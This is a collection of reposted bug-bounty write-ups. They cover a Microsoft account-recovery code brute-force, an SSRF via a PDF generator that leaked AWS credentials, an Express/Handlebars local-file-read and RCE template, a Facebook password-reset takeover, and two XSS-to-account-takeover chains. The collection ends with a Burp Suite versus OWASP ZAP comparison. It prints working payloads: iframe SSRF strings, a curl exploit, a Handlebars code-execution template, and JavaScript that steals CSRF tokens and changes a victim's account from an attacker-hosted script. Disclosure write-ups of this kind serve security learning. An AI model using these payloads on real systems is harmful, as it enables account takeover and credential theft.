My initial test showed the presence of rate limits as expected. Out of 1000 codes sent, only 122 got through; the others were rejected with error code 1211, and they block the respective user account from further attempts if we keep sending requests continuously.

Then, I tried sending simultaneous/concurrent requests like I did for Instagram; that allowed me to send a large number of requests without getting blocked, but I was still unable to get a successful response even when injecting the correct 7 digit security code. I thought they had some controls in place to prevent this type of attack. Although I was getting an error while sending the right code, there was still no evidence of the user being blocked like we saw in the initial test, so I was still hoping that there would be something.


After some days, I realized that they blacklist the IP address if all the requests we send don’t hit the server at the same time; even a few milliseconds of delay between the requests allowed the server to detect the attack and block it. Then I tweaked my code to handle this scenario and tested it again.
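In code, the fix boils down to creating every attempt in the same tick so no measurable delay separates them. A hedged sketch of the idea; the `tryCode` stub below stands in for the real encrypted HTTP request, which is not reproduced here:

```javascript
// Fire all candidate codes concurrently; names are illustrative only.
async function raceCodes(codes, tryCode) {
  // All promises are created back-to-back in the same tick, so the
  // requests leave with essentially no delay between them.
  const results = await Promise.all(codes.map(code => tryCode(code)));
  const hit = results.findIndex(ok => ok);
  return hit === -1 ? null : codes[hit];
}

// Local stand-in for the code-validation endpoint: only the secret validates.
const SECRET = '1234567';
const tryCode = async code => code === SECRET;

raceCodes(['0000000', '1234567', '9999999'], tryCode)
  .then(found => console.log(found)); // '1234567'
```

The real attack additionally needed many source IPs, since each IP could only land a limited burst before being blacklisted.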


Surprisingly, it worked and I was able to get the successful response this time 😀


I sent around 1000 seven digit codes including the right one and was able to get to the next step to change the password.

The above process is valid only for those who do not have two factor authentication enabled, if a user has enabled 2FA, we will have to bypass two factor code authentication as well, to change the password.

I tested an account with 2FA and found that both flows hit the same endpoints, which are vulnerable to this type of attack. At first, the user is prompted to enter a 6 digit code generated by an authenticator app; only then are they asked to enter the 7 digit code sent to their email or phone number. Then they can change the password.

Putting it all together, an attacker has to send all the possibilities of the 6 and 7 digit security codes, which is around 11 million request attempts, and they have to be sent concurrently, to change the password of any Microsoft account (including those with 2FA enabled).

It is not at all an easy process to send such a large number of concurrent requests; it would require a lot of computing resources as well as thousands of IP addresses to complete the attack successfully.

Immediately, I recorded a video of all the bypasses and submitted it to Microsoft along with detailed steps to reproduce the vulnerability. They were quick in acknowledging the issue.

The issue was patched in November 2020, and my case was initially assigned a different security impact than the one expected. I asked them to reconsider the security impact, explaining my attack. After a few back and forth emails, my case was classified as Elevation of Privilege (Involving Multi-factor Authentication Bypass). Due to the complexity of the attack, the bug severity was assigned as important instead of critical.

Bounty email from MSRC

Microsoft Acknowledgement for Reporting this issue

I received the bounty of $50,000 USD on Feb 9th, 2021 through HackerOne and got approval to publish this article on March 1st. I would like to thank Dan, Jarek and the entire MSRC Team for patiently listening to all my comments, providing updates and patching the issue. I would also like to thank Microsoft for the bounty 🙏 😊

Story Behind Sweet SSRF.


Original text by Rohit Soni

Persistence is the Key to Success.🔥


Hey everyone! I hope you all are doing well!

Rohit Soni is back with another write-up, and this time it’s about a critical SSRF which leads to AWS credentials disclosure. Let’s dive in without wasting time.

A couple of months back, when there was a lockdown across the whole world due to the COVID-19 pandemic, I was spending most of my time hunting, learning and exploring new stuff (specifically about pentesting😜).

One day while scrolling my LinkedIn feed I saw someone’s post saying they got into the hall of fame of target.com. The post caught my attention, and as I was not hunting on any program, I started hunting on that one.

Note: I am not allowed to disclose the target website. So, Let’s call it target.com

I created an account on target.com and started exploring every functionality. After spending a couple of hours hunting and exploring, I saw my email address reflected in the response inside a script tag, as shown in the image below.

Look at that email address.

Ahh… the very first thing that came to my mind was XSS. I changed my email address to testacc@hubopss.com-alert("h4ck3d!!")- but failed, because it is not a valid email address. In the very next moment, though, I intercepted the request using Burp, changed my email address in the intercepted request, and forwarded it.

Boom….Got Stored XSS.

XSS is Love❤ (Sorry for poor picture quality😅)
Payload reflected without filtering/encoding/sanitizing special characters.

The root cause of this XSS was a lack of input validation on the server side. The website was validating the email address on the client side only; that’s why it did not allow me to directly input my payload in the email field. But as the server was not filtering or encoding special characters, my payload was stored and I got the pop-up.

Okay, That’s cool but where is the SSRF you promised !? 😐

Main Story begins from here.

A stored XSS is a nice finding, but the hacker inside me was screaming “You can find a critical, I want a P1😜”. So I kept hunting and came across a functionality that allows exporting user-supplied text to a PDF file.

After seeing this functionality I remembered a write-up about SSRF via abusing PDF generator functionality. I had not read the write-up, but I remembered the title. I quickly googled it, found the right write-up, read it, and applied the same approach.

Identification Part :

I was able to figure out that the Custom cover page content field was vulnerable.

Image for post

What I did was supply <center><u>hello there</u></center> HTML tags as input in the Custom cover page content field and export it as PDF, and I got something very interesting.

Image for post

As you can see in the above screenshot, it accepted the HTML tags and generated the PDF according to the supplied HTML. Interesting..!!

The next step was to check if it is vulnerable to SSRF. I confirmed that the PDF generation functionality is vulnerable to SSRF using an <iframe> tag and Burp Collaborator client. The payload I used was:

<iframe src="http://something.burpcollaborator.net"></iframe>

Woah, SSRF Identified. {^_^}

The HTTP request from the target server was logged in my Burp Collaborator client window. Woah, SSRF identified.

Root Cause: the <iframe> tag is used to embed/load a website into another website. While generating the PDF file, the target server requested my Burp Collaborator URL to load it into the <iframe> tag. As a result, the request got logged in my Collaborator client.

Still, this SSRF does not have much impact yet. Let’s exploit it and see what we can achieve.

Exploitation Part

To exploit this SSRF I used following payload.

<iframe src="http://localhost"></iframe>

But unfortunately it didn’t work and showed me a blank PDF file.

Failed. -_-

After that I thought of loading files stored on the server side, for example the /etc/passwd file. To do that I built the following payload.

<iframe src="file://etc/passwd"></iframe>

But again, bad luck. I got the same blank PDF file.

I tried various payloads to exploit the SSRF, but I failed. A few of them are as follows. (I failed, but that doesn’t mean you will too. Try your luck😉)

<iframe src="file://etc/shadow"></iframe>

<iframe src="http:localhost"></iframe>

<iframe src="//"></iframe>

<iframe src=""></iframe>

None of the above payloads worked for me. Then I thought of checking the IP address I got in the Burp Collaborator client on Shodan, and I came to know that the website is running on an Amazon EC2 machine.

Website is Hosted on Amazon EC2 Instance.

After a considerable number of failed attempts, I took a break and decided to ask Ritik Sahni. He is a good friend of mine and a talented 15-year-old hacker. I called him and told him the whole scenario.

He took a few minutes and replied: try to load the following URL in the iframe source:

As soon as I did, I was like, woah!! I got their internal directories and files listed out in the iframe.

Got Internal Directories and Files.

You must be wondering where that IP address came from!

The IP address is a link-local address and is valid only from within the instance. In simple terms, we can say this IP is localhost for your EC2 instance.

And by using it, we can retrieve the instance metadata.

Then Ritik told me to check the iam/ directory. I was able to get AWS security credentials from the iam/ directory. Have a look at the PoC attached below.

Image for post

Final Payload:

<iframe src="" width="100%"></iframe>

Image for post

It took me around 4 hours to identify and exploit SSRF. Special thanks to my friend Ritik Sahni (@deep.tech).

Hope you enjoyed my story. If you have any questions or suggestions reach me through instagram, twitter or linkedin.

Happy Hunting. 🙂

Instagram: @street_of_hacker

Twitter: @streetofhacker

LinkedIn: Rohit Soni

Special Thanks to Ritik Sahni: @deep.tech

And also Thanks to target.com for amazing swags.😁

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps


Original text by CAPTAINFREAK


If you are using ExpressJs with Handlebars as templating engine invoked via hbs view engine, for Server Side Rendering, you are likely vulnerable to Local File Read (LFR) and potential Remote Code Execution (RCE).


  1. If the target responds with X-Powered-By: Express and there is HTML in the responses, it’s highly likely that NodeJs with server-side templating is being used.
  2. Add layout to your wordlist for parameter discovery/fuzzing of the GET query or POST body.
  3. If an arbitrary value for the layout parameter results in a 500 Internal Server Error with ENOENT: no such file or directory in the body, you have hit the LFR.


A bit more than a week back, I stumbled upon a critical Local File Read (LFR) security issue with the potential for Remote Code Execution in a fairly simple ~10 lines of NodeJS/ExpressJs code that looked like the following:

var express = require('express');
var router = express.Router();

router.get('/', function(req, res, next) {
  res.render('index');
});

router.post('/', function(req, res, next) {
  var profile = req.body.profile
  res.render('index', profile)
});

module.exports = router;

The whole source can be found here.

If you are even a little bit familiar with the NodeJs ecosystem and have written at least your first Hello World endpoint in ExpressJs, you will agree that this is clearly straightforward and innocent code.

So after getting surprised and disillusioned by the security bug, I remembered that it’s indeed called Dependency Hell. To be honest, I should not have been that surprised.

The betrayal by built-in modules, dependencies, and packages has introduced numerous security bugs. This is a recurring theme in software security anyway.

To check whether this was a known issue or not, I created a CTF challenge and shared it with many of my talented friends belonging to multiple community forums for Web Security, Node, Backend Engineering, CTFs, and BugBounty.

Node/Express.js Web Security Challenge:https://t.co/vjOUcxHdVx

Very short code: https://t.co/gkjcZ24YUt

Can you find the flag: 𝗰𝗳𝗿𝗲𝗮𝗸{.*}#nodejs #javascript #JS #ctf #bugbounty— CaptainFreak (@0xCaptainFreak) January 15, 2021

Turns out this was not known. Even after I gave out the whole source code of the challenge, only 4 people were able to solve it (all CTFers 🥳):

  1. @JiriPospisil
  2. @CurseRed
  3. @zevtnax
  4. @po6ix

Congrats to all the solvers 🎊 and thanks a lot to everybody who tried out the challenge.

For the people who still wanna try out, I plan to keep the Profiler Challenge up for one more week. Stop Reading and check it out now!

Challenge Solution

curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{"profile":{"layout": "./../routes/index.js"}}' 'http://ctf.shoebpatel.com:9090/'

HTTP request:

POST / HTTP/1.1
Host: ctf.shoebpatel.com:9090
Content-Length: 48
Content-Type: application/json

{
  "profile": {
    "layout": "./../routes/index.js"
  }
}

HTTP Response (content of routes/index.js):

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 463

var express = require('express');
var router = express.Router();

const flag = "cfreak{It's called Dependency Hell for a reason! (https://github.com/pillarjs/hbs/blob/master/lib/hbs.js#L122)}"

/* GET home page. */
router.get('/', function(req, res, next) {
  res.render('index');
});

router.post('/', function(req, res, next) {
  var profile = req.body.profile
  res.render('index', profile)
});

module.exports = router;


"cfreak{It's called Dependency Hell for a reason! (https://github.com/pillarjs/hbs/blob/master/lib/hbs.js#L122)}"

That’s it! What the heck, right? You might be thinking: what even is this layout parameter, and where is it even coming from? So out of context!

If you like Code Review, why don’t you find out? It will be a good code review exercise.

Secret layout parameter

To find out from where it is coming, we can track the flow of our input from Source to Sink till we find out the reason why LFR is happening.

Source (Line 3):

router.post('/', function(req, res, next) {
  var profile = req.body.profile
  res.render('index', profile)
});

Let’s follow the path this profile object argument takes.

res.render = function render(view, options, callback) {
  var app = this.req.app;
  var done = callback;
  var opts = options || {};

  // ...

  // render
  app.render(view, opts, done);
};

The "index" argument became view, and our profile argument became the options parameter, which became opts and flowed into app.render.

app.render = function render(name, options, callback) {
  var done = callback;
  var engines = this.engines;
  var opts = options;
  var renderOptions = {};
  var view;

  // ...
  merge(renderOptions, opts);
  // ...

  var View = this.get('view');

  view = new View(name, {
    defaultEngine: this.get('view engine'),
    root: this.get('views'),
    engines: engines
  });

  // ...

  // render
  tryRender(view, renderOptions, done);
};

function tryRender(view, options, callback) {
  try {
    view.render(options, callback);
  } catch (err) {
    callback(err);
  }
}

View.prototype.render = function render(options, callback) {
  debug('render "%s"', this.path);
  this.engine(this.path, options, callback);
};

In the View class, this.engine becomes an instance of hbs in our case, and this.path = rootViewDir + viewFilename. The options argument is our profile.

I will take the liberty here and modify the code a bit to make it linear and easy to understand, but you can check out the original version on Github.

function middleware(filename, options, cb) {
  // The Culprit: https://github.com/pillarjs/hbs/blob/master/lib/hbs.js#L122
  var layout = options.layout;

  var view_dirs = options.settings.views;
  var layout_filename = [].concat(view_dirs).map(function (view_dir) {
    // Some code to create full paths
    var view_path = path.join(view_dir, layout || 'layout');

    // This actually restricts reading/executing files without extensions.
    if (!path.extname(view_path)) {
      view_path += extension;
    }
    return view_path;
  });

  // in-memory caching code
  function tryReadFileAndCache(templates) {
    var template = templates.shift();
    fs.readFile(template, 'utf8', function (err, str) {
      cacheAndCompile(template, str);
    });
  }

  function cacheAndCompile(filename, str) {
    // Here we get compiled HTML from handlebars
    var layout_template = handlebars.compile(str);
    // Some further logic
  }
}

We can stop analysing here. As you can see in the middleware above, we effectively read from the Root Views Dir + layout and pass the result to handlebars.compile, which compiles a file we completely control and gives us its HTML (except for the extension, since it is appended explicitly from the config if the path does not already have one).

Hence the LFR: we can read any file that has an extension.


As the templating is involved, we do have a strong potential for RCE. It has the following pre-requisites though:

  1. Through the above LFR read ./../package.json.
  2. See the version of hbs being used; it should be <= 4.0.3, because after this version the hbs team started using Handlebars.js of version >= 4.0.14 (commit link).
  3. In Handlebars below this version, it was possible to create RCE payloads. There is an awesome writeup on this by @Zombiehelp54 with which they got RCE on Shopify.
  4. And you should have file upload functionality on the same box with a known location, which is quite an ask considering everybody uses blob storage these days, but we never know 🤷‍♂️

With above fulfilled, you can write a handlebars template payload like below to get RCE:

<!-- (by [@avlidienbrunn](https://twitter.com/avlidienbrunn)) -->

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return JSON.stringify(process.env);"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

Fix 🤕

Easy fix would be to stop using the code anti-pattern shown in the above example like below:

❌ res.render('index', profile)


✅ res.render('index', { profile })

which I think many devs use already, so that they can be more descriptive in templates with the usage of just "{{name}}" vs "{{profile.name}}".

But think for a second again, is the above code safe? Yea sure, we don’t have a way to provide layout in the options argument to res.render anymore. But is there any way to still introduce the culprit layout parameter?

Prototype Pollution!

It would be remiss not to mention proto pollution in a Js/NodeJs Web Security writeup 🙃!

Readers who are unaware of proto pollution, please watch this awesome talk from Olivier Arteau at NorthSec18.

As you can see, even the most common pattern (res.render('template', { profile })) of passing objects to the render function is not safe. If the application has prototype pollution anywhere that lets an attacker add layout to the prototype chain, the output of every call to res.render will be overwritten with the LFR/RCE. So we have a DoS-ish LFR/RCE! In the presence of an exploitable proto pollution, this becomes quite a good gadget and stays unfixable unless we fix the proto pollution.
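To make the gadget concrete, here is a minimal self-contained sketch; the merge function below is a stand-in for any dependency with a recursive-merge prototype-pollution bug, not hbs or Express code:

```javascript
// Naive recursive merge, the classic prototype-pollution sink.
function merge(target, source) {
  for (const key of Object.keys(source)) {
    if (source[key] !== null && typeof source[key] === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attacker-controlled JSON body (JSON.parse keeps __proto__ as an own key):
const body = JSON.parse('{"__proto__": {"layout": "./../routes/index.js"}}');
merge({}, body);

// Every fresh object the app builds now inherits the attacker's layout,
// so even res.render('index', { profile }) hands hbs a layout value:
const renderOptions = { profile: { name: 'test' } };
console.log(renderOptions.layout); // './../routes/index.js'

delete Object.prototype.layout; // clean up after the demo
```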

Solid Fix

  1. First fix proto pollution if you are vulnerable to it.
  2. Then remove the layout key from the incoming object, or otherwise stop it from reaching that vulnerable Sink.

Let me know what you think the proper fix should be.

Above I have described my observations on a potentially critical vulnerability in the Setup of NodeJS + Express + HBS.

As this setup is pretty common, I wanted this writeup to be out there. The handlebars engine in particular is very popular due to its support of HTML semantics. Every time I work on a side-project, I quickly set up the boilerplate code with the quick one-liner of the express-generator cli, express --view hbs, and this creates the exact same stack the above issue is talking about. I don’t know how many times I might have used that code line myself. I plan to do the same kind of review for other view engines that express supports (ejs, hjs, jade, pug, twig, vash).

Anyways, thanks for reading! If something is erroneous, please let me know; I would love to have a constructive discussion.

It’s called Dependency Hell for a reason!


How I hacked Facebook: Part One


Original text by Alaa Abdulridha

We’ve been in this pandemic since March, and once it started I had plenty of free time that I needed to use wisely. So I decided to take the OSWE certification; I finished the exam on the 8th of August. After that, I took a couple of weeks to recover from the OSWE exam. Then, in the middle of September, I said: you know what? I did not register my name in the Facebook hall of fame for 2020 as I do every year. Okay, let’s do it.

I had never found a vulnerability on one of Facebook’s subdomains, so I took a look at some writeups, and one writeup on a Facebook subdomain got all my attention. It was a great write-up; you can check it out: [HTML to PDF converter bug leads to RCE in Facebook server.]

So after reading this write-up, I had a good idea of how many vulnerabilities could be found in such a huge web app.

So my main target was https://legal.tapprd.thefacebook.com and my goal was RCE or something similar.

I ran some fuzzing tools to enumerate the endpoints of this web app, took a 2-hour nap and watched a movie, then got back to see the results. Okay, I got some good results.

Dirs found with a 403 response: /tapprd/

Okay, I think this result is enough to support my earlier theory about how huge this application is. Then I started to read the JavaScript files to see how the website works, what methods it uses, etc.

I noticed a way to bypass the redirection into the Login SSO, https://legal.tapprd.thefacebook.com/tapprd/portal/authentication/login and after analyzing the login page, I noticed this endpoint


and after doing some fuzzing on the user endpoint I noticed another endpoint, /savepassword, which expected a POST request. After reading the JavaScript files I knew how the page worked: there should be a generated token, an xsrf token, etc. The first idea that came to me: okay, let’s test it and see if it will work. I tried to change the password manually using Burp Suite, but I got an error; the error was “execution of this operation failed”.

I said okay, this might be because the email is wrong or something? Let’s get an admin email. I started putting random emails in a list to make a wordlist; after that I used Intruder and said, let’s see what happens.

I got back after a couple of hours and found the same error results, plus one other result: a 302 redirect to the login page. I said wow, I’ll be damned if this worked, haha.

So let’s get back to see what I’ve done here: I sent requests using Intruder with a CSRF token and random emails with a new password to this endpoint, /savepassword,

and one of the results was a 302 redirect.

Image for post

Now I went to the login page, entered the login email and the new password, and BOOM, I logged in successfully to the application, and I could enter the admin panel 🙂

Image for post

I read the report of the hacker who had found the RCE before using the PDF converter, and they gave him a reward of only $1000, so I said okay, let’s make a good impact here and a perfect exploit.

I wrote a quick and simple Python script to exploit this vulnerability: you put in the email and the new password, and the script changes the password.
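For illustration, here is a hedged JavaScript sketch of the same flow. The author's script was Python; the field names and the token step below are assumptions, and a local stub plays the server so the logic can be exercised:

```javascript
// Sketch only: field names and token handling are assumptions; `http`
// is injected so a local stub can stand in for the real server.
async function forceReset(email, newPassword, http) {
  // 1. Load the login page and grab the generated token / xsrf token.
  const token = await http.getCsrfToken();

  // 2. Post the new password for the victim email to /savepassword.
  const res = await http.post('/savepassword', {
    email: email,
    password: newPassword,
    token: token,
  });

  // A 302 redirect to the login page (instead of the usual
  // "execution of this operation failed" error) means success.
  return res.status === 302;
}

// Local stub standing in for the vulnerable server:
const stub = {
  getCsrfToken: async () => 'tok-123',
  // Only a valid admin email yields the 302, as in the write-up.
  post: async (path, body) =>
    ({ status: body.email === 'admin@example.com' ? 302 : 200 }),
};

forceReset('admin@example.com', 'N3wPassw0rd!', stub)
  .then(ok => console.log(ok)); // true
```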

Image for post

The impact here was very high, because Facebook workers used to log in with their workplace accounts, which means they were using their Facebook account access tokens. If another attacker had exploited this, it might have given them the ability to gain access to some Facebook workers’ accounts, etc.

Then I reported the vulnerability, and the report was triaged.

And on the 2nd of October, I received a bounty of $7,500.

Image for post

I enjoyed exploiting this vulnerability so much, so I said that’s not enough, this is a weak script! let’s dig more and more.

And I found two more vulnerabilities on the same application, But we will talk about the other vulnerabilities in the Part two writeup 🙂

You can read the write-up on my website : https://alaa.blog/2020/12/how-i-hacked-facebook-part-one/

And you can follow me on twitter : https://twitter.com/alaa0x2


Escalating XSS to Account Takeover


Original text by Aditya Verma

Hey guys, this writeup is about my first Reflected XSS and how I escalated it to account takeover.

Many bug hunters insist that you shouldn’t submit a plain XSS; try to escalate it. I would also tell you to escalate as much as you can: if you give them an XSS and merely describe what a person could do with it, it does not show the impact the way a working proof does. Proving how it would be done increases the severity as well as your payout.

So, I was hunting on a subdomain of a private program, say sub.example.com. I had been looking over this subdomain for a few days and had understood almost everything about how things work and what a normal account can do. Then I started looking for other files (not directly linked) in various directories of the site by fuzzing directories and files with FFUF. I found a file that looked interesting, as it was a page to register (let’s name it sub.example.com/fakepath/register), while the main page that opened when someone clicked for registration was sub.example.com/fakepath/registration.


Now this felt like a page that was used earlier and later replaced. As you must know, old and forgotten pages have a higher chance of bugs.

I ran Arjun to check for any hidden parameters and luckily found a few that were reflected back on the page. Two of them were filling in the input fields of the registration form. I sent the request with the first parameter, and it filled the value supplied through the URL into the city input field. I sent the request to Burp Suite Repeater and tried basic XSS inputs. Sadly, they got HTML encoded; I tried single URL encoding and double URL encoding, neither worked, which made me move on to check the other parameters.


After trying almost every parameter received from Arjun, I came back to the Repeater tab of the earlier one and just randomly gave another try with triple URL encoding, and guess what: the quote (") character passed through.


I made a simple payload to check: sub.example.com/fakepath/register?i=aditya%252522+onmouseover=alert(1)+x=%252522s. I added the x parameter at the end to balance the quote added by the system. I hovered over the city input field and it popped. I checked the other parameter that was reflected in another input field, and it was also vulnerable to a similar payload. I also noticed that the registration and register pages are almost identical, gave it a try on registration, and yes, both parameters were vulnerable on that page too.
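The %252522 in the payload is just a quote wrapped in three layers of URL encoding; a quick Node.js check shows the layers:

```javascript
// Each encodeURIComponent call adds one layer of URL encoding.
const once = encodeURIComponent('"');     // '%22'
const twice = encodeURIComponent(once);   // '%2522'
const thrice = encodeURIComponent(twice); // '%252522'
console.log(thrice);

// Three decode passes (one per layer peeled off along the way)
// recover the raw quote that finally breaks out of the attribute.
let v = thrice;
for (let i = 0; i < 3; i++) v = decodeURIComponent(v);
console.log(v); // '"'
```

Each decoding hop in the server's pipeline strips one layer, so only the triple-encoded form survives all the filters with the quote intact.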

I reported the bug as medium severity and came back. Then I got the thought: try to escalate it, as other people say. I was at first reluctant, but since I had already checked for CSRF on various forms like account edit, I thought: since this can execute script, why not fetch the account edit page with JavaScript, which will come with the CSRF token (in this case tokens), and then send the data back with the email changed.

This took some time, as I am not much of a developer, but a short time ago I had done a project with NodeJS. With that little familiarity and a lot of googling, I somehow put the jigsaw pieces together and the script was ready. (I created this script in Firefox developer tools; in case anyone wants to know how, the console panel allows running JavaScript on a webpage as if it had come along with the page.) I hosted the script locally and used ngrok to create a tunnel to localhost. I used the following payload: sub.example.com/fakepath/register?i=aditya%252522+/%25253e%25253cscript+src%3d%252522https://my_ngrok_url/script.js%252522%25253e%25253c/script%25253e

Here is the script:

let name=[];
let value=[];

// Fetch the account edit page; the exact path was not shown in the
// original write-up, so this URL is a placeholder.
fetch('https://sub.example.com/fakepath/account_edit')
.then(function(response) {
return response.text()
}).then(function (html) {// Convert the HTML string into a document object
var parser = new DOMParser();
var doc = parser.parseFromString(html, 'text/html');
var element = doc.querySelectorAll('input[type="hidden"]');
// Collect every hidden field (the CSRF tokens among them)
for(var i=0; i<element.length;i++){
name.push(element[i].name);
value.push(element[i].value);
}
sendData();
}).catch(function (err) {
// There was an error
console.warn('Something went wrong.', err);
});

function sendData() {
const XHR = new XMLHttpRequest(),
FD = new FormData();
// Push our data into our FormData object
for(var i=0;i<7;i++) {
FD.append( name[i],value[i] );
}
// Overwrite the email field with the attacker-controlled address
// (field name is illustrative; the real form used its own names)
FD.append('email', 'attacker@example.com');
// Define what happens on successful data submission
XHR.addEventListener( 'load', function( event ) {
alert( 'Yeah! Data sent and response loaded.' );
} );
// Define what happens in case of error
XHR.addEventListener( 'error', function( event ) {
alert( 'Oops! Something went wrong.' );
} );
// Set up our request
XHR.open( 'POST', 'https://sub.example.com/fakepath/accountchange.php?update=1' );
// Send our FormData object; HTTP headers are set automatically
XHR.send( FD );
}

If anyone wanna understand the code then you can directly contact me through Twitter, my handle is 0cirius0.

Coming back now this Reflected XSS became a high severity Account Takeover.

Weaponizing XSS For Fun & Profit


Original text by Saad Ahmed

Hi folks! Hope you are all doing well. I am back with another amazing way of bypassing the WAF that was blocking me from weaponizing an XSS. Without wasting any time, let’s get started.

The XSS part is very simple: my input is reflected inside the href of an <a> tag, e.g. <a href="https://example.com/home/leet">Home</a>

Escaping from the href is very simple. My payload is leet" onmouseover=alert(1)" and now when I move my mouse over the link, the XSS pops up. This is very simple and basic.

It's time to do something BIG!!! I checked all the endpoints of the web app that disclose sensitive information I could steal via the XSS to show impact to the team. After checking all the requests, I found that every request carries a CSRF TOKEN header, so I needed to steal that token and then send the request using fetch to weaponize the XSS.

I tried to remove the CSRF TOKEN from the request and bang!! The request was sent without any error and the account information was UPDATED. But when I tried to reproduce this by creating an HTML form, the server gave a 403 missing CSRF TOKEN. After checking the request and matching all the headers, I realized the devs had done some shortcut work (JUGAR) to prevent CSRF: checking the REFERER header. If the request comes from example.com they accept it; otherwise they return 403 with missing CSRF TOKEN.
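A hypothetical sketch of that flawed server-side logic (names and paths are assumed, not taken from the target):

```javascript
// Flawed "CSRF protection": instead of validating the token itself,
// the server only checks whether the Referer belongs to example.com
function isRequestAllowed(headers) {
  const referer = headers['referer'] || '';
  return referer.startsWith('https://example.com/');
  // otherwise the server responds: 403 missing CSRF TOKEN
}

console.log(isRequestAllowed({ referer: 'https://example.com/account' })); // true
console.log(isRequestAllowed({ referer: 'https://evil.com/csrf.html' }));  // false
```

Because an XSS payload runs on example.com itself, every request it makes carries a valid Referer, so this check is useless against it.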

I already have XSS, so no need to worry about the Referer ✌️ I simply sent the below jQuery POST request from the console just to verify it, and it worked.

$.post("https://example.com/account/update_info/", {name: "Account Update"}, function(data, status){ alert("Data: " + data + "\nStatus: " + status); });

So my final payload that updates the account information is:

leet" onmouseover='$.post(`https://example.com/account/update_info/`, {name: `Account Update`}, function(data, status){ alert(`Data: ` + data + `Status: ` + status); });'

The payload didn't work. Now here the SERVER is doing something bad: it is replacing the . with _, e.g. example.com becomes example_com. I tried everything here, encoding etc., but nothing worked. So my mind clicked: why not simply call a JS file from my server? But again, I would need to put in my server URL, which also contains the . , and document.createElement() also contains a .


For those who don't know, we can also use document.createElement() without the . like this: document['createElement']('script')


So the final code that calls the JS code from the attacker's server is:



Convert the script-tag creation code into charCodes because the server mangles the .
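The conversion step can be sketched like this (an assumed reconstruction, not the author's exact helper): turn the dot-containing loader statement into a char-code list so a literal . never appears in the final payload.

```javascript
// Attacker-side helper (assumed): build the comma-separated char-code
// list that String.fromCharCode will later turn back into the loader
const loader = "var s=document['createElement']('script')";
const codes = Array.from(loader, c => c.charCodeAt(0)).join(',');
console.log(codes); // "118,97,114,32,115,61,100,..." ready to paste into fromCharCode
```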


When I executed this from the XSS, the server encoded the [ ]. So bypassing the . was useless 😠 I tried everything to bypass the [ ] but nothing worked. One of my friends told me you can call a script from the server without . & [ ] and I was like, tell me bruhh howww!!!


So we can use with and the return value of fromCharCode inside eval to execute the string: no need for . & [ ].


The final payload looks like this:

$.post("https://example.com/account/update_info/", {name: "Account Update"}, function(data, status){ alert("Data: " + data + "\nStatus: " + status); });

Converted into charCodes:

Putting the charCode values into the code looks like this:



URL-encode the above code and the final payload becomes:

https://example.com/home/leet" onmouseover='URLENCODED PAYLOAD' "

Send the above link to anyone and you can update their account, delete the account, and perform many more actions.

The program paid $400 for the XSS and told me to submit a new report for the CSRF issue; they paid $1800 for the CSRF, for a TOTAL of $2200.


This whole bypass and upgrading process was done in 3 days 🙌. I hope you guys learned something new here.


Burp Suite vs OWASP ZAP – a Comparison series

Burp Suite vs OWASP ZAP – a Comparison series

Original text by Jaw33sh

Burp Suite {Pro} vs OWASP ZAP! Does more expensive mean better?

In this post, I would like to document some of the differences between the two most renowned interception proxies used by penetration testers as well as DevSecOps teams around the globe.


I am no expert in either tool; however, I have used them enough to feel good about documenting their features in this post. Please comment if you see an error or want to point out something I missed.


Both OWASP ZAP and Burp Suite are intercepting proxies (on steroids) that sit between the browser and the webserver to intercept and manipulate the requests exchanged.

OWASP ZAP is a free and open-source project actively maintained by volunteers, while Burp Suite is a commercial product maintained and sold by PortSwigger. Both have appeared on almost every top-10 tools list of the year, and in this post I will compare version 2020.x of Burp Suite, which saw its first release in January 2020.

We can see that since they emerged on the market, they have been gaining more and more momentum and users, as Google Trends shows for the past 5 years (2015-2020). Hopefully, by the end of this post, you will have a better understanding of their similarities and differences.

Trends between 2015 and 2020
Google Trends showing Burp suite in blue and OWASP ZAP in Red

I will discuss the differences between both tools in regards to the following aspects:

  1. Describing the User Interface
  2. Listing capabilities and features for both tools
  3. Personal User Experience with each one of them
  4. Pros and Cons of each tool 

1. User Interface

The user interface can be frustrating when you first see it. Still, after a while, it gets intuitive and has all the necessary info you need to know. Both tools have 6 simple items in their interface.

Burp Suite has a simple interface consisting of 6 simple windows.

Burp Suite 2020.2.1 User Interface
  1. Menu Bar – Provides navigation menus and tools settings
  2. Tabs Bar -Provides most of the functionality of burp in simple tabs
  3. Status Bar – Provides information for memory and disk space used by burp (new handy feature)
  4. Event Log – Provides a log for Burp Suite containing additional information
  5. Issues and Vulnerabilities window – Provides a list of detected vulnerabilities and is Active on a paid version of Burp Suite Pro or Enterprise
  6. Tasks menu – Provides simple information and control over current running, paused and finished tasks

ZAP likewise has a simple interface consisting of 6 items:

ZAP 1.8.0 user interface Source: https://www.zaproxy.org/getting-started/
  1. Menu Bar – Provides access to many of the automated and manual tools.
  2. Toolbar – Includes buttons that provide easy access to most commonly used features.
  3. Tree Window – Displays the Sites tree and the Scripts tree.
  4. Workspace Window – Displays requests, responses, and scripts and allows you to edit them.
  5. Information Window – Displays details of the automated and manual tools.
  6. Footer – Displays a summary of the alerts found and the status of the main automated tools.

2. Capabilities

Both Burp Suite and ZAP have good sets of capabilities; however, on some features one tool excels more than the other. We will get to each one further down in separate posts.

  • Intercepting feature with SSL/TLS support and web sockets.
  • Interception History.
  • Tree navigation for scope.
  • Scope definition.
  • Manual request editor and sender.
  • Plugins, Extensions, and Marketplace/Store.
  • Vulnerability tree or Issues display.
  • Fuzzer capabilities with default lists.
  • Scan Policy configuration.
  • Report generation capability.
  • Encoders and Decoders.
  • Spider function.
  • Auto check for Update features.
  • Save and Load Project files.
  • Exposed and usable APIs.
  • Passive and Active scan engine.
  • Session token entropy analysis (Burp only; if you know that ZAP supports this, even with add-ons, please leave a comment).
  • Knowledge Base (Burp only, as ZAP does not support that in the UI).
